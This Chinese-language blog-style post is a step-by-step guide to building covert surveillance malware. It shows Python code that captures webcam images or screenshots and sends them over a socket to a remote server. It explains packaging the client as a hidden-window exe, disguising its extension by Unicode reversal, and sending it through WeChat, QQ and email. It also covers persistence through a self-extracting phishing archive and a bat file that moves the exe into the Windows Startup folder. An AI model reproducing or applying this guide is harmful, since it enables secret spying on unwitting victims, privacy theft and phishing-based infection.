记录利用摄像头、截屏等进行实时监控

1、通过python编写脚本，实现调用笔记本摄像头功能，使用CV2、numpy这2个库。

cap = cv2.VideoCapture(0) 调用笔记本自带的摄像头

ret,frame = cap.read() 读取图片

encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 95] 压缩图片

result, imgencode = cv2.imencode('.jpg',frame,encode_param)

转换图片格式

2、使用socket传输图片到服务器上实现监控，代码简单示意。

address = ('192.168.1.1', 2345)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect(address)

sock.send(数据流)

3、在公网服务器上，使用socket服务端进行接收图片，并保存在服务器上。

 代码省略

4、编写好的python客户端脚本进行一个打包，打包成exe，注意cv2,numpy库的版本不要太新，不然打包时候会出现问题

使用pyinstaller -F .py -p 库文件目录 -i .icon -w

-F  参数 把所需要的库文件、代码、图标打包生成一个exe文件

-w 参数 程序启动时不显示命令行

-p 参数 指定所需的库文件

-i  参数 指定图标

5、使用后缀名反转方式进行伪装，分别尝试使用微信、QQ、邮件进行发送，发现一些问题。

微信客户端（windows）-接收方会显示exe的文件属性，会提示文件风险，Unicode反转后缀名会被转换为正常的exe结尾的图

QQ客户端（windows）-实时发送文件不会更改伪装后的后缀名，双击即可执行。

邮件（Foxmail）-也是会转换成正常的exe文件

6、云服务器执行服务端脚本等待连接并接收图片

7、在调用摄像头的时候会发现，目前笔记本摄像头都带打开提示和指示灯，一旦启动摄像头就会开启指示灯，如何绕过笔记本的指示灯，只调用摄像头？

摄像头结构示意

可以得知：LED是ASIC控制的，ASIC控制LED的方式是写在摄像头的固件里的。

如果想要绕过那要从硬件入手，重新烧录摄像头固件，或者固件本身存在漏洞。

8、不能绕过摄像头指示灯，那只能另选他路，调用笔记本截屏功能默默进行监控。使用PIL库，在原本的代码中新增一句代码

im = ImageGrab.grab() 截屏

其余过程都一样

9、但这个脚本只能执行一次，如何使脚本自启动？

windows系统当中可以把exe文件放到开始-程序-启动这个目录下，重启就可以自启。

10、需要写一个bat文件启动dos命令把exe文件移动到启动文件夹下，这时可以使用自解压的钓鱼方式，解压自运行。

以windows10不同版本之间的路径不一样，大概分为2种：

C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup

C:Users%UserName%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

11、编写bat文件。

cmd /C “move 1.exe C:Users%UserName%AppDataRoamingMicrosoftWindowsSTARTM~1ProgramsStartup”

cmd /C “move 1.exe C:ProgramDataMicrosoftWindowsSTARTM~1ProgramsStartup“

路径中含有空格会在dos命令中报错，需要用短路径进行代替。

自解压的显示图像

自解压配置内容

bat内容

11、1.bat执行结果，执行成功